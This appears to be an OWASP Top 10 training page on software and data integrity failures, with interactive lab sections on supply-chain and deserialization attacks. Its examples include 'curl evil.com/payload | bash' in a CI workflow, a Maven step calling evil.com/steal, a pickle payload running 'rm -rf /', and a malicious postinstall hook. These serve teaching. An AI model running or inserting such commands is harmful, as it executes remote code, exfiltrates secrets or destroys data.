OWASP Top 10 - A08 Software and Data Integrity Failures

What are Software and Data Integrity Failures?

Software and data integrity failures relate to code and infrastructure that does not protect against integrity violations. This includes insecure CI/CD pipelines, auto-update mechanisms without integrity verification, serialized data being trusted without validation, and software supply chain attacks.

🎯 Common Integrity Failure Types

Supply Chain Attacks: Compromised dependencies, malicious packages, and tainted software distributions
Insecure Deserialization: Untrusted serialized data leading to remote code execution
CI/CD Pipeline Compromise: Injection of malicious code during build/deployment processes
Missing Integrity Verification: Software updates without cryptographic verification
Vulnerable Dependencies: Using components with known security vulnerabilities
Code Signing Bypass: Circumventing digital signature verification mechanisms

⚠️ Attack Impact

Remote code execution through malicious packages or deserialization
Data tampering and integrity compromise
Supply chain poisoning affecting downstream users
Privilege escalation via trusted but compromised components
Persistent backdoor installation through update mechanisms
Large-scale compromise via widely-used dependencies

🔍 Attack Techniques

# Supply Chain Attack Example
# Malicious package uploaded to registry
{
  "name": "lodash-utils",  // Typosquatting
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "postinstall": "node malware.js"  // Runs on install
  }
}

# Dependency Confusion Attack
pip install internal-package  // Attacker uploads to PyPI
# Higher version number tricks package manager

# Malicious Dependency Injection
npm install evil-package@latest
# Contains:
const fs = require('fs');
const os = require('os');
// Exfiltrates SSH keys, environment variables, etc.

# CI/CD Pipeline Poisoning
# .github/workflows/build.yml
- run: curl evil.com/payload | bash  // Injected step
- run: npm install --production

🗂️ Insecure Deserialization Attacks

# Python Pickle Exploitation
import pickle
import subprocess

class RCE:
    def __reduce__(self):
        return (subprocess.call, (['rm', '-rf', '/'],))

# Serialized malicious object
malicious_data = pickle.dumps(RCE())
# When deserialized: pickle.loads(malicious_data)
# Executes: rm -rf /

# Java Deserialization (URLDNS Chain)
ObjectInputStream ois = new ObjectInputStream(input);
Object obj = ois.readObject();  // Dangerous!

# .NET Binary Formatter
BinaryFormatter formatter = new BinaryFormatter();
object obj = formatter.Deserialize(stream);  // Vulnerable

# Node.js serialize-javascript bypass
eval('(' + serializedData + ')')  // Code injection

# PHP Object Injection
class User {
    public function __destruct() {
        system($this->cmd);  // Dangerous destructor
    }
}
unserialize($_GET['data']);  // Exploitable

🔗 Supply Chain Attack Vectors

# Package Manager Attacks

## NPM Package Hijacking
1. Find abandoned but popular package
2. Contact maintainer or claim ownership
3. Publish malicious update
4. Victims auto-update to compromised version

## Dependency Confusion
1. Identify internal package names
2. Upload to public registry with higher version
3. Build systems prefer "newer" public package
4. Internal dependency replaced with malicious code

## Typosquatting
Popular: "lodash" → Malicious: "lodahs", "lodash-utils"
Popular: "requests" → Malicious: "request", "urllib"

## Build Tool Injection
# Maven pom.xml injection

    org.codehaus.mojo
    exec-maven-plugin
    
        
            compile
            exec
            
                curl
                
                    evil.com/steal
                
            
        
    

🛡️ Secure Development Practices

Software Bill of Materials (SBOM): Track all dependencies and their versions
Dependency Scanning: Regular vulnerability assessment of third-party components
Package Pinning: Lock dependency versions and verify checksums
Secure Deserialization: Use safe serialization formats and validation
CI/CD Security: Secure build pipelines with integrity checks
Code Signing: Cryptographically sign and verify software artifacts

// Secure Deserialization Example
// Instead of: pickle.loads(data)
import json
import jsonschema

schema = {
    "type": "object",
    "properties": {
        "name": {"type": "string"},
        "age": {"type": "integer", "minimum": 0}
    },
    "required": ["name", "age"]
}

try:
    data = json.loads(json_string)
    jsonschema.validate(data, schema)
    # Safe to use data
except (json.JSONDecodeError, jsonschema.ValidationError):
    # Handle invalid data

// Package Integrity Verification
{
  "dependencies": {
    "lodash": "4.17.21"
  },
  "integrity": {
    "lodash": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg=="
  }
}

// Supply Chain Security Tools
npm audit  # Vulnerability scanning
npm audit fix  # Automatic patching
snyk test  # Commercial scanner
OWASP Dependency Check  # Free scanner

📦 Lab 1: Software Supply Chain & Dependency Attacks

Scenario: You're a security researcher investigating a software development company's build environment. Your mission: exploit supply chain vulnerabilities, inject malicious dependencies, and compromise the CI/CD pipeline through package manager attacks and dependency confusion.

Attack Attempts: 0 | Packages Compromised: 0/5 | Pipeline Breaches: 0

📋 Package Manager Console

DevCorp Package Manager v2.1.3

Type 'help' for available commands

> _

Package Manager Command:

💡 Hint: Try installing packages with typos, version confusion, or known vulnerabilities

🌳 Dependency Tree Analysis

devcorp-app@1.0.0

├── express@4.18.2

├── lodash@4.17.21

├── moment@2.29.4

└── uuid@9.0.0

Total packages: 4 | Vulnerabilities: Unknown

Malicious Package Upload:

Attack Vector:

🔍 Vulnerability Scanner

🛡️ DevCorp Security Scanner

Last Scan: 2024-01-15 (45 days ago)

Status: Idle

Scan Type:

Target Repository:

No scan results available

⚙️ CI/CD Pipeline Exploitation

🔧 DevCorp Build Pipeline

Pipeline: GitHub Actions → Docker Build → Deploy

Security: Basic (No secrets scanning)

Auto-Deploy: Enabled on main branch

Pipeline Injection Method:

Malicious Payload:

Supply Chain Security Assessment Goals:

🎯 Identify and exploit vulnerable dependencies

🎯 Perform dependency confusion attacks

🎯 Upload malicious packages to compromise builds

🎯 Bypass security scanners and monitoring

🎯 Compromise CI/CD pipeline integrity

🚨 Supply Chain Vulnerabilities

This environment demonstrates critical supply chain security flaws:

Outdated Vulnerability Scanning: Infrequent security audits allow vulnerable packages
No Package Integrity Verification: Missing checksum and signature validation
Permissive CI/CD Pipeline: Unrestricted package installation and execution
Dependency Confusion Susceptible: No internal package repository priority
Missing SBOM: No software bill of materials tracking

🔗 Lab 2: Insecure Deserialization & Data Integrity Attacks

Scenario: You've discovered a web application that uses serialization for session management and data storage. Your objective: exploit insecure deserialization vulnerabilities, manipulate serialized data, and achieve remote code execution through various serialization formats.

Deserialization Attempts: 0 | RCE Achieved: 0/3 | Data Integrity Bypassed: 0

📄 Serialized Data Inspector

Serialization Format:

Serialized Data:

Select a format and generate sample data

💀 Exploit Payload Generator

Target Platform:

Exploit Objective:

Callback Address:

Exploit payload will be generated here

🔐 Data Integrity Verification

🛡️ Integrity Protection System

Algorithm: SHA-256

Key: secret_key_12345

Status: Active

Data to Verify:

Provided Hash:

Integrity verification results will appear here

🔄 Session Object Manipulation

Session Cookie:

Decoded Session Data:

Modified Session Data:

Session manipulation results will appear here

Deserialization Security Assessment Goals:

🎯 Exploit insecure deserialization vulnerabilities

🎯 Achieve remote code execution through serialized objects

🎯 Bypass data integrity verification mechanisms

🎯 Manipulate session data for privilege escalation

🎯 Demonstrate the impact of untrusted deserialization

🚨 Deserialization Vulnerabilities

This application demonstrates several critical deserialization flaws:

Untrusted Data Deserialization: Direct deserialization of user-controlled data
Weak Integrity Protection: Predictable or compromised signing keys
Missing Input Validation: No structure or content validation before processing
Dangerous Object Types: Allowing deserialization of arbitrary object classes
Privilege Escalation: Session manipulation leading to unauthorized access

Real-world Impact: Deserialization vulnerabilities can lead to complete system compromise, data breaches, and persistent backdoor installation.

OWASP Top 10 Security Lab

Software and Data Integrity Failures